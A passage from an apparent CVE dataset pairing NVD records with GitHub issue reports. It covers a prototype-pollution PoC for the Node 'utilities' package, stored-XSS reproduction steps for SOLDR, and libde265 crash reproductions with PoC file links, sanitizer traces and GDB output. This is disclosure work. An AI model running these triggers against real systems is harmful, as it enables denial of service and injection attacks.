"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mde/utilities/issues/29"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-UTILITIES-3184491"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mde/utilities/issues/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-UTILITIES-3184491"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:utilities_project:utilities:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "0D407893-B946-4A84-BE64-58F863ACB055",
"versionEndExcluding": null,
"versionEndIncluding": "1.0.6",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/mde/utilities/issues/29 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"mde",
"utilities"
] | Hi,There's a prototype pollution vulnerability in function _mix() in utilities/lib/core.js, the risk locate is in here:
https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L65
https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L41
and the POC is:
var utilities = require("utilities")
bad_objects= {test:"123"}
console.log("Before:"+{}.test)
utilities.i18n.loadLocale("__proto__",bad_objects,{},true)
console.log("After:"+{}.test)
In the file i18n.js, there is a function called loadLocale, which calls the mixin function in utilities/lib/core.js, and it calls the _mix function in 22 lines, and in the _mix function, where the object is merged, resulting in prototype pollution
More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
| Prototype Pollution using utilities.i18n.loadLocale() | https://api.github.com/repos/mde/utilities/issues/29/comments | 10 | 2022-12-27T13:48:36Z | 2023-03-06T23:16:02Z | https://github.com/mde/utilities/issues/29 | 1,511,820,111 | 29 | 4,774 |
CVE-2023-26608 | 2023-03-01T01:15:10.597 | SOLDR (System of Orchestration, Lifecycle control, Detection and Response) 1.1.0 allows stored XSS via the module editor. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/vxcontrol/soldr/compare/v1.1.0...v1.2.0"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vxcontrol/soldr/issues/89"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/vxcontrol/soldr/compare/v1.1.0...v1.2.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vxcontrol/soldr/issues/89"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vxcontrol:soldr:1.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AF81C55A-AEF2-4824-A911-BD586EEAC763",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/vxcontrol/soldr/issues/89 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"vxcontrol",
"soldr"
] | ### Describe the bug
Creating/editing module we can edit main.vue, so it leads to stored XSS and also potential impact for interact with WebSocket using valid origin.
Potential impact: Low privilege user affect on high privilege

### Steps to Reproduce
1. Create/edit module
2. Edit main.vue and add for example: alert("xss") in script block
3. Open module and browser will render this main.vue
4. Get XSS alert, or interact with WebSocket using Cross-site Websocket Hijacking bug
[Place](https://github.com/vxcontrol/soldr/blob/38b606ec69971d67e866b1edff4083c6233d2353/pkg/app/api/server/proto/proto.go#L111) where not implemented origin check => CSWSH
Exploiting XSS we can interact with WS-server tusing valid origin, so better use CSRF-token to prevent this situations
### Screenshots, screen recording, code snippet
Get XSS alert

### Environment information
module version: 1.0.1
### Which agent binary used?
- [ ] darwin-amd64
- [ ] linux-386
- [ ] linux-amd64
- [ ] windows-386
- [x] windows-amd64 | [Bug]: Potential stored XSS | https://api.github.com/repos/vxcontrol/soldr/issues/89/comments | 0 | 2023-02-08T07:26:36Z | 2023-02-27T16:22:17Z | https://github.com/vxcontrol/soldr/issues/89 | 1,575,622,718 | 89 | 4,775 |
CVE-2023-24751 | 2023-03-01T15:15:11.393 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the mc_chroma function at motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/379"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/379"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/379 | [
"Exploit",
"Patch",
"Vendor Advisory"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function mc_chroma at motion.cc:244
# Version
```
git log
commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv03.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==7799==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55b3b6a88832 bp 0x7ffcc9fb8d30 sp 0x7ffcc9fb5180 T0)
==7799==The signal is caused by a READ memory access.
==7799==Hint: address points to the zero page.
#0 0x55b3b6a88831 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:244
#1 0x55b3b6a80067 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:412
#2 0x55b3b6a80edd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2141
#3 0x55b3b6968fb7 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#4 0x55b3b6971418 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4504
#5 0x55b3b69752e1 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#6 0x55b3b69773db in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#7 0x55b3b697a0c2 in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#8 0x55b3b6883487 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#9 0x55b3b6886ca0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#10 0x55b3b6887934 in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#11 0x55b3b688d902 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1338
#12 0x55b3b6852f9d in main /home/fuzz/libde265/dec265/dec265.cc:764
#13 0x7f184b1ce082 in __libc_start_main ../csu/libc-start.c:308
#14 0x55b3b68570dd in _start (/home/fuzz/libde265/dec265/dec265+0x240dd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/motion.cc:244 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)
==7799==ABORTING
```
# POC
[poc_segv03.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv03.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv03.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x00005555557c2324 in mc_chroma<unsigned char> (ctx=0x621000000100, sps=0x629000005210, mv_x=0, mv_y=2, xP=0, yP=0, out=0x7ffffffe6d60, out_stride=16, ref=0x0, ref_stride=0, nPbWC=8, nPbHC=16, bit_depth_C=8) at motion.cc:244
244 padbuf[x+extra_left + (y+extra_top)*(MAX_CU_SIZE+16)] = ref[ xA + yA*ref_stride ];
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00005555557c2316 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6304 and %edi,%edx
0x00005555557c2318 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6306 test %dl,%dl
0x00005555557c231a mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6308 je 0x5555557c2324 <mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318>
0x00005555557c231c mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6310 mov %rax,%rdi
0x00005555557c231f mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6313 callq 0x555555570dd0 <__asan_report_load1@plt>
0x00005555557c2324 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 movzbl (%rcx),%ecx
0x00005555557c2327 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6321 lea -0x1610(%r15),%rdx
0x00005555557c232e mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6328 movslq %esi,%rax
0x00005555557c2331 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6331 add %rdx,%rax
0x00005555557c2334 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6334 mov %rax,%rdx
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x0000000000000000 rbx 0x000055555581d4e0 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007ffffffe29f0 rsp 0x00007ffffffdee60
r8 0x0000000000000000 r9 0x0000000000000000 r10 0x00007ffffffe2a10 r11 0x00007ffffffe6d60 r12 0x00007ffffffe2a10 r13 0x00000fffffffbde0 r14 0x00007ffffffdef00 r15 0x00007ffffffe29c0
rip 0x00005555557c2324 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
239 for (int x=-extra_left;x<nPbWC+extra_right;x++) {
240
241 int xA = Clip3(0,wC-1,x + xIntOffsC);
242 int yA = Clip3(0,hC-1,y + yIntOffsC);
243
244 padbuf[x+extra_left + (y+extra_top)*(MAX_CU_SIZE+16)] = ref[ xA + yA*ref_stride ];
245 }
246 }
247
248 src_ptr = &padbuf[extra_left + extra_top*(MAX_CU_SIZE+16)];
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x00005555557c2324 in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 at motion.cc:244
[1] from 0x000055555579fcb0 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+11224 at motion.cc:412
[2] from 0x00005555557b92dd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2141
[3] from 0x0000555555683258 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[4] from 0x0000555555687afa in read_coding_unit(thread_context*, int, int, int, int)+15196 at slice.cc:4504
[5] from 0x0000555555689d5e in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[6] from 0x00005555556729f1 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[7] from 0x000055555568aec2 in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[8] from 0x000055555568e986 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
[9] from 0x000055555558c18a in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*)+3516 at decctx.cc:852
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 14091 name dec265 from 0x00005555557c2324 in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 at motion.cc:244
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg ctx = 0x621000000100: {<error_queue> = {warnings = {[0] = DE265_WARNING_CTB_OUTSIDE_IMAGE_AREA, […, sps = 0x629000005210: {sps_read = true,video_parameter_set_id = 12 '\f',sps_max_sub_layers = 5 '\…, mv_x = 0, mv_y = 2, xP = 0, yP = 0, out = 0x7ffffffe6d60: 0, out_stride = 16, ref = 0x0: Cannot access memory at address 0x0, ref_stride = 0, nPbWC = 8, nPbHC = 16, bit_depth_C = 8
loc xA = 0, yA = 0, x = -1, y = -1, padbuf = '\000' <repeats 5359 times>, src_ptr = 0x0: Cannot access memory at address 0x0, src_stride = 0, extra_left = 1, extra_right = 2, extra_bottom = 2, extra_top = 1, __PRETTY_FUNCTION__ = "void mc_chroma(const base_context*, const seq_parameter_set*, int, int, int, int, int16_t*, int, co…, shift3 = 6, wC = 16, hC = 48, xFracC = 0, yFracC = 2, xIntOffsC = 0, yIntOffsC = 0, mcbuffer = {[0] = 0 <repeats 4544 times>}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>> p ref
$1 = (const unsigned char *) 0x0
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.
| NULL Pointer Dereference in function mc_chroma at motion.cc:244 | https://api.github.com/repos/strukturag/libde265/issues/379/comments | 2 | 2023-01-28T03:15:32Z | 2023-03-04T07:38:40Z | https://github.com/strukturag/libde265/issues/379 | 1,560,664,401 | 379 | 4,776 |
CVE-2023-24752 | 2023-03-01T15:15:11.447 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_hevc_epel_pixels_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/378"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/378"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/378 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987
# Version
```
git log
commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv02.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==7777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x561cd0288664 bp 0x000000000008 sp 0x7ffc7e060af0 T0)
==7777==The signal is caused by a READ memory access.
==7777==Hint: address points to the zero page.
#0 0x561cd0288663 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
#1 0x561cd0288663 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /home/fuzz/libde265/libde265/x86/sse-motion.cc:987
#2 0x561cd032c6ab in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296
#3 0x561cd032c6ab in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:205
#4 0x561cd0323067 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:412
#5 0x561cd0323edd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2141
#6 0x561cd020f601 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
#7 0x561cd02182e1 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x561cd02188b6 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4638
#9 0x561cd021a3db in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x561cd021d0c2 in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x561cd0126487 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x561cd0129ca0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x561cd012a934 in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x561cd012e1c7 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x561cd012f62c in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x561cd0130df5 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x561cd00f5f9d in main /home/fuzz/libde265/dec265/dec265.cc:764
#18 0x7f8428229082 in __libc_start_main ../csu/libc-start.c:308
#19 0x561cd00fa0dd in _start (/home/fuzz/libde265/dec265/dec265+0x240dd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709 in _mm_loadl_epi64(long long __vector(2) const*)
==7777==ABORTING
```
# POC
[poc_segv02.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv02.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv02.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
_mm_loadl_epi64(long long __vector(2) const*) (__P=<optimized out>) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
709 return _mm_set_epi64 ((__m64)0LL, *(__m64_u *)__P);
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x0000555555706650 _mm_loadl_epi64(long long __vector(2) const*)+84 setle %r10b
0x0000555555706654 _mm_loadl_epi64(long long __vector(2) const*)+88 test %dil,%dil
0x0000555555706657 _mm_loadl_epi64(long long __vector(2) const*)+91 setne %r11b
0x000055555570665b _mm_loadl_epi64(long long __vector(2) const*)+95 test %r11b,%r10b
0x000055555570665e _mm_loadl_epi64(long long __vector(2) const*)+98 jne 0x55555570713a <ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*)+4010>
0x0000555555706664 _mm_loadl_epi64(long long __vector(2) const*)+104 movq 0x0(%rbp),%xmm7
0x0000555555706669 _mm_loadl_epi64(long long __vector(2) const*)+109 mov %r12,%r9
0x000055555570666c _mm_loadl_epi64(long long __vector(2) const*)+112 shr $0x3,%r9
0x0000555555706670 _mm_loadl_epi64(long long __vector(2) const*)+116 cmpw $0x0,0x7fff8000(%r9)
0x0000555555706679 _mm_loadl_epi64(long long __vector(2) const*)+125 punpcklbw %xmm6,%xmm7
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
